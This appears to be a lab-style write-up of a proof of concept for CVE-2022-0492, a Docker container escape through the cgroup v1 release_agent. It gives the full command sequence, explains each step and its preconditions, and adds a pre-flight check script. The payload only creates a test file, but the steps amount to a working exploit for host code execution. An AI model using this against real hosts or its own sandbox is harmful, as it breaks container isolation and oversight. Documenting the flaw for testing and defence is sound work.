Docker >> Container Escape
CVE-2022-0492
References:
1. CVE-2022-0492
2. containerd.io_1.2.13-2_amd64.deb
3. docker-ce_19.03.10~3-0~ubuntu-focal_amd64.deb
4. docker-ce-cli_19.03.10~3-0~ubuntu-focal_amd64.deb
Test environment:
Ubuntu 20.04 (5.4.0-21-generic)
Docker version 19.03.10, build 9424aeaee9
Test steps:
$ sudo docker run --rm -it --security-opt apparmor=unconfined --security-opt seccomp=unconfined ubuntu:22.04 /bin/bash
cve:/# unshare -UrmC --propagation=unchanged bash
cve:/# mkdir /tmp/test
cve:/# mount -t cgroup -o rdma cgroup /tmp/test
cve:/# mkdir /tmp/test/x
cve:/# echo 1 > /tmp/test/x/notify_on_release
cve:/# echo '#!/bin/sh' > /cmd
cve:/# echo "touch /tmp/cve_test" >> /cmd
cve:/# chmod 0777 /cmd
cve:/# host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
cve:/# echo "$host_path/cmd" > /tmp/test/release_agent
cve:/# sh -c "echo \$\$ > /tmp/test/x/cgroup.procs"
cve:/# exit
cve:/# exit
# ls /tmp
cve_test

The last two commands run on the host (prompt `#`, outside the container): `/tmp/cve_test` exists on the host, so the release_agent script was executed by the kernel in the host's context, not inside the container. How the steps fit together: `unshare -UrmC` creates a new user namespace (mapping the caller to root in it) plus new mount and cgroup namespaces, which is where the unprivileged process obtains CAP_SYS_ADMIN; the `rdma` controller is chosen because the host does not normally mount it, so the new cgroup v1 hierarchy has the container's cgroup as its root and exposes a writable `release_agent` file; `notify_on_release=1` on the child cgroup `x` makes the kernel invoke the release agent when the last process leaves `x`, which is what the `sh -c` line arranges by placing a short-lived shell in it. The `sed` on `/etc/mtab` recovers the overlay2 `upperdir` so that the path written to `release_agent` is valid on the host, where the agent is run. On a fixed kernel the write to `release_agent` is rejected because the caller lacks CAP_SYS_ADMIN in the initial user namespace.

Caveat: the two `--security-opt ... unconfined` flags are what make this reproducible. Docker's default seccomp profile and the `docker-default` AppArmor profile block the `unshare` and `mount` calls used here, so a container started with the default profiles is not exploitable by this sequence; the CVE matters mainly for containers run with seccomp/AppArmor disabled or with `CAP_SYS_ADMIN` already granted.
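The steps above rely on three conditions that are worth checking from inside a container before (or instead of) running the PoC: the overlay2 `upperdir` that the `sed` on `/etc/mtab` extracts, whether seccomp is actually unconfined, and whether cgroup v1 (and therefore `release_agent`) exists at all. The following POSIX shell script is an added example written for this page, not code from the original write-up or from any upstream project; the `SAMPLE_MTAB` line and the function names are constructed for illustration. `overlay_upperdir` does the same job as the page's `sed` but splits the mount options on commas so only the `upperdir=` field can match; `seccomp_mode` reads the `Seccomp:` field of `/proc/<pid>/status`; `cgroup_v1_available` reports whether any cgroup v1 (`cgroup` type) filesystem is mounted.

```shell
#!/bin/sh
# Added pre-flight checks for the CVE-2022-0492 release_agent escape.
# Hypothetical helper script; not part of the original write-up.

# Constructed sample of an overlay2 root mount as it appears in /etc/mtab
# inside a Docker container (all paths are made up).
SAMPLE_MTAB='overlay / overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/AAA:/var/lib/docker/overlay2/l/BBB,upperdir=/var/lib/docker/overlay2/0123abcd/diff,workdir=/var/lib/docker/overlay2/0123abcd/work 0 0'

# Print the host-side upperdir of the container rootfs from mtab text on
# stdin. Field 3 is the filesystem type, field 4 the option list; the
# options are split on commas so only the upperdir= entry is matched
# ("upperdir=" is 9 characters, so the value starts at offset 10).
overlay_upperdir() {
    awk '$3 == "overlay" {
        n = split($4, opts, ",")
        for (i = 1; i <= n; i++)
            if (index(opts[i], "upperdir=") == 1) { print substr(opts[i], 10); exit }
    }'
}

# Print the seccomp mode from /proc/<pid>/status text on stdin:
# 0 = disabled, 1 = strict, 2 = filter. A container started with Docker's
# default profile reports 2; the test above ran with seccomp=unconfined,
# which reports 0.
seccomp_mode() {
    awk '$1 == "Seccomp:" { print $2; exit }'
}

# Exit 0 if a cgroup v1 filesystem (type "cgroup") is mounted according to
# the mtab text on stdin, 1 otherwise. A pure cgroup2 mount has no
# release_agent file, so the technique does not apply there.
cgroup_v1_available() {
    awk '$3 == "cgroup" { found = 1 } END { exit !found }'
}

# Run the checks against the live system when /proc is available (Linux).
if [ -r /proc/self/status ] && [ -r /proc/mounts ]; then
    echo "seccomp mode:  $(seccomp_mode < /proc/self/status)"
    echo "host upperdir: $(overlay_upperdir < /proc/mounts)"
    if cgroup_v1_available < /proc/mounts; then
        echo "cgroup v1 mounts present (release_agent may exist)"
    else
        echo "no cgroup v1 mounts (release_agent technique not applicable)"
    fi
fi
```

Run it inside the container before `unshare`: a seccomp mode of 2 means the default profile is still in force and the `unshare`/`mount` calls in the steps above will be denied; an empty upperdir means the rootfs is not overlay2 and the `sed` in the PoC would produce a bogus `release_agent` path.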